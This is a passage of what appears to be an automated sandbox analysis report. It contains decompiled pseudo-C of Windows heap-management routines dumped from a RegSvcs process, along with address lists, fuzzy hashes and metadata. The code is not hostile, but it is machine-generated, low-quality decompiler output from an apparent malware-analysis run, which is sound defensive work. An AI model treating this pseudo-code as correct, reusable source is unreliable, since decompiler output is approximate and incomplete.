                                          				_t289 = 0x4cb2f;
                                          				_t425 = __edx[1];
                                          				_t403 =  *__edx << 2;
                                          				if(_t403 < 8) {
                                          					L3:
                                          					_t404 = _t403 - 1;
                                          					if(_t404 == 0) {
                                          						L16:
                                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                          						L17:
                                          						_t426 = _v40;
                                          						_v20 = _t426 + 0x1c;
                                          						_t177 = L0131FAD0(_t426 + 0x1c);
                                          						_t385 = 0;
                                          						while(1) {
                                          							L18:
                                          							_t405 =  *(_t426 + 4);
                                          							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
                                          							_t316 = _t289 & _t179;
                                          							_v24 = _t179;
                                          							_v32 = _t316;
                                          							_v12 = _t316 >> 0x18;
                                          							_v36 = _t316 >> 0x10;
                                          							_v28 = _t316 >> 8;
                                          							if(_t385 != 0) {
                                          								goto L21;
                                          							}
                                          							_t418 = _t405 >> 5;
                                          							if(_t418 == 0) {
                                          								_t406 = 0;
                                          								L31:
                                          								if(_t406 == 0) {
                                          									L35:
                                          									E0131FA00(_t289, _t316, _t406, _t426 + 0x1c);
                                          									 *0x13eb1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
                                          									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
                                          									_v36 = _t319;
                                          									if(_t319 != 0) {
                                          										asm("stosd");
                                          										asm("stosd");
                                          										asm("stosd");
                                          										_t408 = _v16;
                                          										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
                                          										 *((char*)(_t319 + 0xb)) =  *_v16;
                                          										 *(_t319 + 4) = _t289;
                                          										_t53 = _t319 + 0xc; // 0xc
                                          										E01312280(E0133F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
                                          										_t428 = _v40;
                                          										_t386 = 0;
                                          										while(1) {
                                          											L38:
                                          											_t202 =  *(_t428 + 4);
                                          											_v16 = _v16 | 0xffffffff;
                                          											_v16 = _v16 << (_t202 & 0x0000001f);
                                          											_t323 = _v16 & _t289;
                                          											_v20 = _t323;
                                          											_v20 = _v20 >> 0x18;
                                          											_v28 = _t323;
                                          											_v28 = _v28 >> 0x10;
                                          											_v12 = _t323;
                                          											_v12 = _v12 >> 8;
                                          											_v32 = _t323;
                                          											if(_t386 != 0) {
                                          												goto L41;
                                          											}
                                          											_t247 = _t202 >> 5;
                                          											_v24 = _t247;
                                          											if(_t247 == 0) {
                                          												_t412 = 0;
                                          												L50:
                                          												if(_t412 == 0) {
                                          													L53:
                                          													_t291 =  *(_t428 + 4);
                                          													_v28 =  *((intOrPtr*)(_t428 + 0x28));
                                          													_v44 =  *(_t428 + 0x24);
                                          													_v32 =  *((intOrPtr*)(_t428 + 0x20));
                                          													_t207 = _t291 >> 5;
                                          													if( *_t428 < _t207 + _t207) {
                                          														L74:
                                          														_t430 = _t291 >> 5;
                                          														_t293 = _v36;
                                          														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
                                          														_v44 = _t210;
                                          														_t159 = _t430 - 1; // 0xffffffdf
                                          														_t428 = _v40;
                                          														_t330 =  *(_t428 + 8);
                                          														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                          														_t412 = _t293;
                                          														 *_t293 =  *(_t330 + _t386 * 4);
                                          														 *(_t330 + _t386 * 4) = _t293;
                                          														 *_t428 =  *_t428 + 1;
                                          														_t289 = 0;
                                          														L75:
                                          														E0130FFB0(_t289, _t412, _t428 + 0x1c);
                                          														if(_t289 != 0) {
                                          															_t428 =  *(_t428 + 0x24);
                                          															 *0x13eb1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
                                          															 *_t428();
                                          														}
                                          														L77:
                                          														return E0133B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
                                          													}
                                          													_t334 = 2;
                                          													_t207 = E0132F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
                                          													if(_t207 < 0) {
                                          														goto L74;
                                          													}
                                          													_t413 = _v24;
                                          													if(_t413 < 4) {
                                          														_t413 = 4;
                                          													}
                                          													 *0x13eb1e0(_t413 << 2, _v28);
                                          													_t207 =  *_v32();
                                          													_t386 = _t207;
                                          													_v16 = _t386;
                                          													if(_t386 == 0) {
                                          														_t291 =  *(_t428 + 4);
                                          														if(_t291 >= 0x20) {
                                          															goto L74;
                                          														}
                                          														_t289 = _v36;
                                          														_t412 = 0;
                                          														goto L75;
                                          													} else {
                                          														_t108 = _t413 - 1; // 0x3
                                          														_t337 = _t108;
                                          														if((_t413 & _t337) == 0) {
                                          															L62:
                                          															if(_t413 > 0x4000000) {
                                          																_t413 = 0x4000000;
                                          															}
                                          															_t295 = _t386;
                                          															_v24 = _v24 & 0x00000000;
                                          															_t392 = _t413 << 2;
                                          															_t230 = _t428 | 0x00000001;
                                          															_t393 = _t392 >> 2;
                                          															asm("sbb ecx, ecx");
                                          															_t341 =  !(_v16 + _t392) & _t393;
                                          															if(_t341 <= 0) {
                                          																L67:
                                          																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
                                          																_v32 = _t395;
                                          																_v20 = 0;
                                          																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
                                          																	L72:
                                          																	_t345 =  *(_t428 + 8);
                                          																	_t207 = _v16;
                                          																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
                                          																	 *(_t428 + 8) = _t207;
                                          																	 *(_t428 + 4) = _t291;
                                          																	if(_t345 != 0) {
                                          																		 *0x13eb1e0(_t345, _v28);
                                          																		_t207 =  *_v44();
                                          																		_t291 =  *(_t428 + 4);
                                          																	}
                                          																	goto L74;
                                          																} else {
                                          																	goto L68;
                                          																}
                                          																do {
                                          																	L68:
                                          																	_t298 =  *(_t428 + 8);
                                          																	_t431 = _v20;
                                          																	_v12 = _t298;
                                          																	while(1) {
                                          																		_t347 =  *(_t298 + _t431 * 4);
                                          																		_v24 = _t347;
                                          																		if((_t347 & 0x00000001) != 0) {
                                          																			goto L71;
                                          																		}
                                          																		 *(_t298 + _t431 * 4) =  *_t347;
                                          																		_t300 =  *(_t347 + 4) & _t395;
                                          																		_t398 = _v16;
                                          																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                          																		_t303 = _v24;
                                          																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
                                          																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
                                          																		_t395 = _v32;
                                          																		_t298 = _v12;
                                          																	}
                                          																	L71:
                                          																	_v20 = _t431 + 1;
                                          																	_t428 = _v40;
                                          																} while (_v20 <  *(_t428 + 4) >> 5);
                                          																goto L72;
                                          															} else {
                                          																_t399 = _v24;
                                          																do {
                                          																	_t399 = _t399 + 1;
                                          																	 *_t295 = _t230;
                                          																	_t295 = _t295 + 4;
                                          																} while (_t399 < _t341);
                                          																goto L67;
                                          															}
                                          														}
                                          														_t354 = _t337 | 0xffffffff;
                                          														if(_t413 == 0) {
                                          															L61:
                                          															_t413 = 1 << _t354;
                                          															goto L62;
                                          														} else {
                                          															goto L60;
                                          														}
                                          														do {
                                          															L60:
                                          															_t354 = _t354 + 1;
                                          															_t413 = _t413 >> 1;
                                          														} while (_t413 != 0);
                                          														goto L61;
                                          													}
                                          												}
                                          												_t89 = _t412 + 8; // 0x8
                                          												_t244 = E013CE7A8(_t89);
                                          												_t289 = _v36;
                                          												if(_t244 == 0) {
                                          													_t412 = 0;
                                          												}
                                          												goto L75;
                                          											}
                                          											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
                                          											_t323 = _v32;
                                          											while(1) {
                                          												L41:
                                          												_t386 =  *_t386;
                                          												_v12 = _t386;
                                          												if((_t386 & 0x00000001) != 0) {
                                          													break;
                                          												}
                                          												if(_t323 == ( *(_t386 + 4) & _v16)) {
                                          													L45:
                                          													if(_t386 == 0) {
                                          														goto L53;
                                          													}
                                          													if(E013CE7EB(_t386, _t408) != 0) {
                                          														_t412 = _v12;
                                          														goto L50;
                                          													}
                                          													_t386 = _v12;
                                          													goto L38;
                                          												}
                                          											}
                                          											_t386 = 0;
                                          											_v12 = 0;
                                          											goto L45;
                                          										}
                                          									}
                                          									_t412 = 0;
                                          									goto L77;
                                          								}
                                          								_t38 = _t406 + 8; // 0x8
                                          								_t364 = _t38;
                                          								if(E013CE7A8(_t38) == 0) {
                                          									_t406 = 0;
                                          								}
                                          								E0131FA00(_t289, _t364, _t406, _v20);
                                          								goto L77;
                                          							}
                                          							_t24 = _t418 - 1; // -1
                                          							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
                                          							_t316 = _v32;
                                          							L21:
                                          							_t406 = _v24;
                                          							while(1) {
                                          								_t385 =  *_t385;
                                          								_v12 = _t385;
                                          								if((_t385 & 0x00000001) != 0) {
                                          									break;
                                          								}
                                          								if(_t316 == ( *(_t385 + 4) & _t406)) {
                                          									L26:
                                          									if(_t385 == 0) {
                                          										goto L35;
                                          									}
                                          									_t177 = E013CE7EB(_t385, _v16);
                                          									if(_t177 != 0) {
                                          										_t406 = _v12;
                                          										goto L31;
                                          									}
                                          									_t385 = _v12;
                                          									goto L18;
                                          								}
                                          							}
                                          							_t385 = 0;
                                          							_v12 = 0;
                                          							goto L26;
                                          						}
                                          					}
                                          					_t419 = _t404 - 1;
                                          					if(_t419 == 0) {
                                          						L15:
                                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                          						_t425 =  &(_t425[1]);
                                          						goto L16;
                                          					}
                                          					_t420 = _t419 - 1;
                                          					if(_t420 == 0) {
                                          						L14:
                                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                          						_t425 =  &(_t425[1]);
                                          						goto L15;
                                          					}
                                          					_t421 = _t420 - 1;
                                          					if(_t421 == 0) {
                                          						L13:
                                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                          						_t425 =  &(_t425[1]);
                                          						goto L14;
                                          					}
                                          					_t422 = _t421 - 1;
                                          					if(_t422 == 0) {
                                          						L12:
                                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                          						_t425 =  &(_t425[1]);
                                          						goto L13;
                                          					}
                                          					_t423 = _t422 - 1;
                                          					if(_t423 == 0) {
                                          						L11:
                                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                          						_t425 =  &(_t425[1]);
                                          						goto L12;
                                          					}
                                          					if(_t423 != 1) {
                                          						goto L17;
                                          					} else {
                                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                          						_t425 =  &(_t425[1]);
                                          						goto L11;
                                          					}
                                          				} else {
                                          					_t401 = _t403 >> 3;
                                          					_t403 = _t403 + _t401 * 0xfffffff8;
                                          					do {
                                          						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
                                          						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
                                          						_t288 = _t425[7] & 0x000000ff;
                                          						_t425 =  &(_t425[8]);
                                          						_t289 = _t310 + _t383 + _t288;
                                          						_t401 = _t401 - 1;
                                          					} while (_t401 != 0);
                                          					goto L3;
                                          				}
                                          			}






































































                                          0x013cebe7
                                          0x013cebe9
                                          0x013cebec
                                          0x00000000
                                          0x013cebe6
                                          0x013cebe1
                                          0x013ceba4
                                          0x013ceba9
                                          0x013cebb0
                                          0x013cebb3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013cebab
                                          0x013cebab
                                          0x013cebab
                                          0x013cebac
                                          0x013cebac
                                          0x00000000
                                          0x013cebab
                                          0x013ceb97
                                          0x013ceb19
                                          0x013ceb1c
                                          0x013ceb21
                                          0x013ceb26
                                          0x013ceb2c
                                          0x013ceb2c
                                          0x00000000
                                          0x013ceb26
                                          0x013cead6
                                          0x013cead9
                                          0x013ceadc
                                          0x013ceadc
                                          0x013ceadc
                                          0x013ceade
                                          0x013ceae4
                                          0x00000000
                                          0x00000000
                                          0x013ceaee
                                          0x013ceaf7
                                          0x013ceaf9
                                          0x00000000
                                          0x00000000
                                          0x013ceb04
                                          0x013ceb12
                                          0x00000000
                                          0x013ceb12
                                          0x013ceb06
                                          0x00000000
                                          0x013ceb06
                                          0x013ceaf0
                                          0x013ceaf2
                                          0x013ceaf4
                                          0x00000000
                                          0x013ceaf4
                                          0x013cea6a
                                          0x013cea21
                                          0x00000000
                                          0x013cea21
                                          0x013ce9d6
                                          0x013ce9d6
                                          0x013ce9e0
                                          0x013ce9e2
                                          0x013ce9e2
                                          0x013ce9e8
                                          0x00000000
                                          0x013ce9e8
                                          0x013ce987
                                          0x013ce98f
                                          0x013ce992
                                          0x013ce995
                                          0x013ce995
                                          0x013ce998
                                          0x013ce998
                                          0x013ce99a
                                          0x013ce9a0
                                          0x00000000
                                          0x00000000
                                          0x013ce9a9
                                          0x013ce9b2
                                          0x013ce9b4
                                          0x00000000
                                          0x00000000
                                          0x013ce9ba
                                          0x013ce9c1
                                          0x013ce9cf
                                          0x00000000
                                          0x013ce9cf
                                          0x013ce9c3
                                          0x00000000
                                          0x013ce9c3
                                          0x013ce9ab
                                          0x013ce9ad
                                          0x013ce9af
                                          0x00000000
                                          0x013ce9af
                                          0x013ce924
                                          0x013ce8b7
                                          0x013ce8ba
                                          0x013ce902
                                          0x013ce908
                                          0x013ce90a
                                          0x00000000
                                          0x013ce90a
                                          0x013ce8bc
                                          0x013ce8bf
                                          0x013ce8f9
                                          0x013ce8ff
                                          0x013ce901
                                          0x00000000
                                          0x013ce901
                                          0x013ce8c1
                                          0x013ce8c4
                                          0x013ce8f0
                                          0x013ce8f6
                                          0x013ce8f8
                                          0x00000000
                                          0x013ce8f8
                                          0x013ce8c6
                                          0x013ce8c9
                                          0x013ce8e7
                                          0x013ce8ed
                                          0x013ce8ef
                                          0x00000000
                                          0x013ce8ef
                                          0x013ce8cb
                                          0x013ce8ce
                                          0x013ce8de
                                          0x013ce8e4
                                          0x013ce8e6
                                          0x00000000
                                          0x013ce8e6
                                          0x013ce8d3
                                          0x00000000
                                          0x013ce8d5
                                          0x013ce8db
                                          0x013ce8dd
                                          0x00000000
                                          0x013ce8dd
                                          0x013ce853
                                          0x013ce855
                                          0x013ce85b
                                          0x013ce85d
                                          0x013ce897
                                          0x013ce89c
                                          0x013ce8a2
                                          0x013ce8a6
                                          0x013ce8ab
                                          0x013ce8ad
                                          0x013ce8ad
                                          0x00000000
                                          0x013ce85d

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: eb2dc41821a36566d1161a5122f83280add726d319fd1ce278ddb8db59c296b5
                                          • Instruction ID: fa101a67d4cb17159cea5c35550c5074e2d656b7a740014776a4848690ca0161
                                          • Opcode Fuzzy Hash: eb2dc41821a36566d1161a5122f83280add726d319fd1ce278ddb8db59c296b5
                                          • Instruction Fuzzy Hash: 67029F72E006169FDB18CFADC8916BEBFF6AF88214B19817DD456EB381D634E901CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 29%
                                          			E012F40E1(void* __edx) {
                                          				void* _t19;
                                          				void* _t29;
                                          
                                          				_t28 = _t19;
                                          				_t29 = __edx;
                                          				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push("HEAP: ");
                                          						E012FB150();
                                          					} else {
                                          						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E012FB150("Invalid heap signature for heap at %p", _t28);
                                          					if(_t29 != 0) {
                                          						E012FB150(", passed to %s", _t29);
                                          					}
                                          					_push("\n");
                                          					E012FB150();
                                          					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                          						 *0x13e6378 = 1;
                                          						asm("int3");
                                          						 *0x13e6378 = 0;
                                          					}
                                          					return 0;
                                          				}
                                          				return 1;
                                          			}






                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                          • API String ID: 0-188067316
                                          • Opcode ID: c8c0850b6627963048a195d4d6f7c482e01745bb797b55e294dd381d16fcbdb8
                                          • Instruction ID: 0af0a5bded41a8a517c9bb36475eb21aee6cef58fd2e14e1a8e88bdb3c75f45b
                                          • Opcode Fuzzy Hash: c8c0850b6627963048a195d4d6f7c482e01745bb797b55e294dd381d16fcbdb8
                                          • Instruction Fuzzy Hash: BD014C321342819ED32D9769E40EF63BBA4DB00F30F19403DF5046B781CBE59440CA11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E0131A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                          				void* _v5;
                                          				signed short _v12;
                                          				intOrPtr _v16;
                                          				signed int _v20;
                                          				signed short _v24;
                                          				signed short _v28;
                                          				signed int _v32;
                                          				signed short _v36;
                                          				signed int _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				signed short* _v52;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				signed int _t131;
                                          				signed char _t134;
                                          				signed int _t138;
                                          				char _t141;
                                          				signed short _t142;
                                          				void* _t146;
                                          				signed short _t147;
                                          				intOrPtr* _t149;
                                          				intOrPtr _t156;
                                          				signed int _t167;
                                          				signed int _t168;
                                          				signed short* _t173;
                                          				signed short _t174;
                                          				intOrPtr* _t182;
                                          				signed short _t184;
                                          				intOrPtr* _t187;
                                          				intOrPtr _t197;
                                          				intOrPtr _t206;
                                          				intOrPtr _t210;
                                          				signed short _t211;
                                          				intOrPtr* _t212;
                                          				signed short _t214;
                                          				signed int _t216;
                                          				intOrPtr _t217;
                                          				signed char _t225;
                                          				signed short _t235;
                                          				signed int _t237;
                                          				intOrPtr* _t238;
                                          				signed int _t242;
                                          				unsigned int _t245;
                                          				signed int _t251;
                                          				intOrPtr* _t252;
                                          				signed int _t253;
                                          				intOrPtr* _t255;
                                          				signed int _t256;
                                          				void* _t257;
                                          				void* _t260;
                                          
                                          				_t256 = __edx;
                                          				_t206 = __ecx;
                                          				_t235 = _a4;
                                          				_v44 = __ecx;
                                          				_v24 = _t235;
                                          				if(_t235 == 0) {
                                          					L41:
                                          					return _t131;
                                          				}
                                          				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                          				if(_t251 == 0) {
                                          					__eflags =  *0x13e8748 - 1;
                                          					if( *0x13e8748 >= 1) {
                                          						__eflags =  *(__edx + 2) & 0x00000008;
                                          						if(( *(__edx + 2) & 0x00000008) == 0) {
                                          							_t110 = _t256 + 0xfff; // 0xfe7
                                          							__eflags = (_t110 & 0xfffff000) - __edx;
                                          							if((_t110 & 0xfffff000) != __edx) {
                                          								_t197 =  *[fs:0x30];
                                          								__eflags =  *(_t197 + 0xc);
                                          								if( *(_t197 + 0xc) == 0) {
                                          									_push("HEAP: ");
                                          									E012FB150();
                                          									_t260 = _t257 + 4;
                                          								} else {
                                          									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          									_t260 = _t257 + 8;
                                          								}
                                          								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                          								E012FB150();
                                          								_t257 = _t260 + 4;
                                          								__eflags =  *0x13e7bc8;
                                          								if(__eflags == 0) {
                                          									E013B2073(_t206, 1, _t251, __eflags);
                                          								}
                                          								_t235 = _v24;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				_t134 =  *((intOrPtr*)(_t256 + 6));
                                          				if(_t134 == 0) {
                                          					_t210 = _t206;
                                          					_v48 = _t206;
                                          				} else {
                                          					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                          					_v48 = _t210;
                                          				}
                                          				_v5 =  *(_t256 + 2);
                                          				do {
                                          					if(_t235 > 0xfe00) {
                                          						_v12 = 0xfe00;
                                          						__eflags = _t235 - 0xfe01;
                                          						if(_t235 == 0xfe01) {
                                          							_v12 = 0xfdf0;
                                          						}
                                          						_t138 = 0;
                                          					} else {
                                          						_v12 = _t235 & 0x0000ffff;
                                          						_t138 = _v5;
                                          					}
                                          					 *(_t256 + 2) = _t138;
                                          					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                          					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                          					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                          						_t141 = 0;
                                          					} else {
                                          						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                          						_v40 = _t141;
                                          						if(_t141 >= 0xfe) {
                                          							_push(_t210);
                                          							E013BA80D(_t236, _t256, _t210, 0);
                                          							_t141 = _v40;
                                          						}
                                          					}
                                          					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                          					 *((char*)(_t256 + 6)) = _t141;
                                          					_t142 = _v12;
                                          					 *_t256 = _t142;
                                          					 *(_t256 + 3) = 0;
                                          					_t211 = _t142 & 0x0000ffff;
                                          					 *((char*)(_t256 + 7)) = 0;
                                          					_v20 = _t211;
                                          					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                          						_t119 = _t256 + 0x10; // -8
                                          						E0134D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                          						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                          						_t211 = _v20;
                                          					}
                                          					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                          					if(_t252 == 0) {
                                          						L56:
                                          						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                          						_t146 = _t206 + 0xc0;
                                          						goto L19;
                                          					} else {
                                          						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                          							L15:
                                          							_t185 = _t211;
                                          							goto L17;
                                          						} else {
                                          							while(1) {
                                          								_t187 =  *_t252;
                                          								if(_t187 == 0) {
                                          									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                          									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                          									goto L17;
                                          								}
                                          								_t252 = _t187;
                                          								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                          									continue;
                                          								}
                                          								goto L15;
                                          							}
                                          							while(1) {
                                          								L17:
                                          								_t212 = E0131AB40(_t206, _t252, 1, _t185, _t211);
                                          								if(_t212 != 0) {
                                          									_t146 = _t206 + 0xc0;
                                          									break;
                                          								}
                                          								_t252 =  *_t252;
                                          								_t211 = _v20;
                                          								_t185 =  *(_t252 + 0x14);
                                          							}
                                          							L19:
                                          							if(_t146 != _t212) {
                                          								_t237 =  *(_t206 + 0x4c);
                                          								_t253 = _v20;
                                          								while(1) {
                                          									__eflags = _t237;
                                          									if(_t237 == 0) {
                                          										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                          									} else {
                                          										_t184 =  *(_t212 - 8);
                                          										_t237 =  *(_t206 + 0x4c);
                                          										__eflags = _t184 & _t237;
                                          										if((_t184 & _t237) != 0) {
                                          											_t184 = _t184 ^  *(_t206 + 0x50);
                                          											__eflags = _t184;
                                          										}
                                          										_t147 = _t184 & 0x0000ffff;
                                          									}
                                          									__eflags = _t253 - (_t147 & 0x0000ffff);
                                          									if(_t253 <= (_t147 & 0x0000ffff)) {
                                          										goto L20;
                                          									}
                                          									_t212 =  *_t212;
                                          									__eflags = _t206 + 0xc0 - _t212;
                                          									if(_t206 + 0xc0 != _t212) {
                                          										continue;
                                          									} else {
                                          										goto L20;
                                          									}
                                          									goto L56;
                                          								}
                                          							}
                                          							L20:
                                          							_t149 =  *((intOrPtr*)(_t212 + 4));
                                          							_t33 = _t256 + 8; // -16
                                          							_t238 = _t33;
                                          							_t254 =  *_t149;
                                          							if( *_t149 != _t212) {
                                          								_push(_t212);
                                          								E013BA80D(0, _t212, 0, _t254);
                                          							} else {
                                          								 *_t238 = _t212;
                                          								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                          								 *_t149 = _t238;
                                          								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                          							}
                                          							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                          							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                          							if(_t255 == 0) {
                                          								L36:
                                          								if( *(_t206 + 0x4c) != 0) {
                                          									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                          									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                          								}
                                          								_t210 = _v48;
                                          								_t251 = _v12 & 0x0000ffff;
                                          								_t131 = _v20;
                                          								_t235 = _v24 - _t131;
                                          								_v24 = _t235;
                                          								_t256 = _t256 + _t131 * 8;
                                          								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                          									goto L41;
                                          								} else {
                                          									goto L39;
                                          								}
                                          							} else {
                                          								_t216 =  *_t256 & 0x0000ffff;
                                          								_v28 = _t216;
                                          								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                          									L28:
                                          									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                          									_v32 = _t242;
                                          									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                          										_t167 = _t242 + _t242;
                                          									} else {
                                          										_t167 = _t242;
                                          									}
                                          									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                          									_t168 = _t167 << 2;
                                          									_v40 = _t168;
                                          									_t206 = _v44;
                                          									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                          									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                          										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                          									}
                                          									_t217 = _v16;
                                          									if(_t217 != 0) {
                                          										_t173 = _t217 - 8;
                                          										_v52 = _t173;
                                          										_t174 =  *_t173;
                                          										__eflags =  *(_t206 + 0x4c);
                                          										if( *(_t206 + 0x4c) != 0) {
                                          											_t245 =  *(_t206 + 0x50) ^ _t174;
                                          											_v36 = _t245;
                                          											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                          											__eflags = _t245 >> 0x18 - _t225;
                                          											if(_t245 >> 0x18 != _t225) {
                                          												_push(_t225);
                                          												E013BA80D(_t206, _v52, 0, 0);
                                          											}
                                          											_t174 = _v36;
                                          											_t217 = _v16;
                                          											_t242 = _v32;
                                          										}
                                          										_v28 = _v28 - (_t174 & 0x0000ffff);
                                          										__eflags = _v28;
                                          										if(_v28 > 0) {
                                          											goto L34;
                                          										} else {
                                          											goto L33;
                                          										}
                                          									} else {
                                          										L33:
                                          										_t58 = _t256 + 8; // -16
                                          										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                          										_t206 = _v44;
                                          										_t217 = _v16;
                                          										L34:
                                          										if(_t217 == 0) {
                                          											asm("bts eax, edx");
                                          										}
                                          										goto L36;
                                          									}
                                          								} else {
                                          									goto L24;
                                          								}
                                          								while(1) {
                                          									L24:
                                          									_t182 =  *_t255;
                                          									if(_t182 == 0) {
